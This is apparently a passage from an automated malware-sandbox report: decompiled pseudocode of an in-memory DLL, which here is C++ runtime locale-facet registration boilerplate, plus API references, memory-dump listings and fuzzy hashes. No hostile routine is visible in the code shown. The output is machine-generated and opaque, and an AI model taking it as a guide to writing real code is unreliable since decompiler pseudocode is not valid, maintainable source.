																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6DDB161C(0x6de96d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6DDD66BA(_t946 - 0x14);
																				return E6DDF0075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6DDE0F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t946 - 0x20);
																						E6DDF3D74(_t946 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t668, _t886, _t908, 0x14);
																						E6DDD6653(_t946 - 0x14, 0);
																						_t909 =  *0x6de96dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6DDB161C(0x6de96d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6DDD66BA(_t946 - 0x14);
																							return E6DDF0075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6DDE0FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t946 - 0x20);
																									E6DDF3D74(_t946 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t668, _t887, _t909, 0x14);
																									E6DDD6653(_t946 - 0x14, 0);
																									_t910 =  *0x6de96df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6DDB161C(0x6de96d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6DDD66BA(_t946 - 0x14);
																										return E6DDF0075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6DDE1057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t946 - 0x20);
																												E6DDF3D74(_t946 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t668, _t888, _t910, 0x14);
																												E6DDD6653(_t946 - 0x14, 0);
																												_t911 =  *0x6de96dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6DDB161C(0x6de96d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6DDD66BA(_t946 - 0x14);
																													return E6DDF0075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6DDE10BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t946 - 0x20);
																															E6DDF3D74(_t946 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t668, _t889, _t911, 0x14);
																															E6DDD6653(_t946 - 0x14, 0);
																															_t912 =  *0x6de96df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6DDB161C(0x6de96da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6DDD66BA(_t946 - 0x14);
																																return E6DDF0075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6DDE1127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t946 - 0x20);
																																		E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t668, _t890, _t912, 0x14);
																																		E6DDD6653(_t946 - 0x14, 0);
																																		_t913 =  *0x6de96df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6DDB161C(0x6de96da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6DDD66BA(_t946 - 0x14);
																																			return E6DDF0075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6DDE11AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t946 - 0x20);
																																					E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t668, _t891, _t913, 0x14);
																																					E6DDD6653(_t946 - 0x14, 0);
																																					_t914 =  *0x6de96dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6DDB161C(0x6de96d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6DDD66BA(_t946 - 0x14);
																																						return E6DDF0075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6DDE1230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t946 - 0x20);
																																								E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t668, _t892, _t914, 0x14);
																																								E6DDD6653(_t946 - 0x14, 0);
																																								_t915 =  *0x6de96dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6DDB161C(0x6de96d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6DDD66BA(_t946 - 0x14);
																																									return E6DDF0075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6DDE12B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t946 - 0x20);
																																											E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t668, _t893, _t915, 0x14);
																																											E6DDD6653(_t946 - 0x14, 0);
																																											_t916 =  *0x6de96dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6DDB161C(0x6de96d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6DDD66BA(_t946 - 0x14);
																																												return E6DDF0075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6DDE1339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t946 - 0x20);
																																														E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t668, _t894, _t916, 0x14);
																																														E6DDD6653(_t946 - 0x14, 0);
																																														_t917 =  *0x6de96db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6DDB161C(0x6de96d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6DDD66BA(_t946 - 0x14);
																																															return E6DDF0075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6DDE13A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t946 - 0x20);
																																																	E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t668, _t895, _t917, 0x14);
																																																	E6DDD6653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6de96ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6DDB161C(0x6de96d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t946 - 0x14);
																																																		return E6DDF0075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6DDE1409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t946 - 0x20);
																																																				E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t668, _t896, _t918, 0x14);
																																																				E6DDD6653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6de96de0; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6DDB161C(0x6de96d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t946 - 0x14);
																																																					return E6DDF0075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6DDE1471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t946 - 0x20);
																																																							E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t668, _t897, _t919, 0x14);
																																																							E6DDD6653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6de96dfc; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6DDB161C(0x6de96da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t946 - 0x14);
																																																								return E6DDF0075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6DDE14EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t946 - 0x20);
																																																										E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t668, _t898, _t920, 0x14);
																																																										E6DDD6653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6de96dcc; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6DDB161C(0x6de96d80);
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t946 - 0x14);
																																																											return E6DDF0075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6DDE1558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t946 - 0x20);
																																																													E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t668, _t899, _t921, 0x14);
																																																													E6DDD6653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6de96e00; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6DDB161C(0x6de96dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t946 - 0x14);
																																																														return E6DDF0075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6DDE15C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6DDB1438(_t946 - 0x20);
																																																																E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de383cf, _t668, _t900, _t922, 0x14);
																																																																E6DDD6653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6de96dd0; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6DDB161C(0x6de96d60);
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6DDD66BA(_t946 - 0x14);
																																																																	return E6DDF0075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6DDE162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6DDB1438(_t815);
																																																																			E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																																			asm("int3");
																																																																			E6DDF00AC(0x6de3851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6de3c0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6DDE542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6DDF0075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6DDD6FD3(__eflags, _t901);
																																																																			 *0x6de3a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6de96dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t900);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6de96e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t899);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6de96dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t898);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6de96dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t897);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6de96de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t896);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6de96ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t895);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6de96db0 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t894);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6de96dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t893);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6de96dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t892);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6de96dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t891);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6de96df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t890);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6de96df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6DDD6FD3(__eflags, _t889);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6de96dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6DDD6FD3(__eflags, _t888);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6de96df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6DDD6FD3(__eflags, _t887);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6de96dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6DDD6FD3(__eflags, _t886);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6de96dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6DDD6FD3(__eflags, _t885);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6de96db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6DDD6FD3(__eflags, _t884);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6de96de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6DDD6FD3(__eflags, _t883);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6de96dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6DDD6FD3(__eflags, _t882);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6de96db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6DDD6FD3(__eflags, _t881);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6de96de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDEF98
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDEFA2
int.LIBCPMT ref: 6DDDEFB9

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDDEFDC
std::_Facet_Register.LIBCPMT ref: 6DDDEFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF013
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF031

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 7afa3f912d934ffaf844dd9995da11ddccc5645e43674609d4fe1fa07d0ae0dd
Instruction ID: 28f3a08b1220108f47b491c578490e750a962449267921eef35a724bdf6a5aab
Opcode Fuzzy Hash: 7afa3f912d934ffaf844dd9995da11ddccc5645e43674609d4fe1fa07d0ae0dd
Instruction Fuzzy Hash: 8E11E575849119DBCF05FB64C840BFDB7B5AF44318F26440AF625AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t242 - 0x14, 0);
				_t231 =  *0x6de96de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6DDB161C(0x6de96d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6DDD66BA(_t242 - 0x14);
					return E6DDF0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6DDE1471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t242 - 0x20);
							E6DDF3D74(_t242 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t225, _t231, 0x14);
							E6DDD6653(_t242 - 0x14, 0);
							_t232 =  *0x6de96dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6DDB161C(0x6de96da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
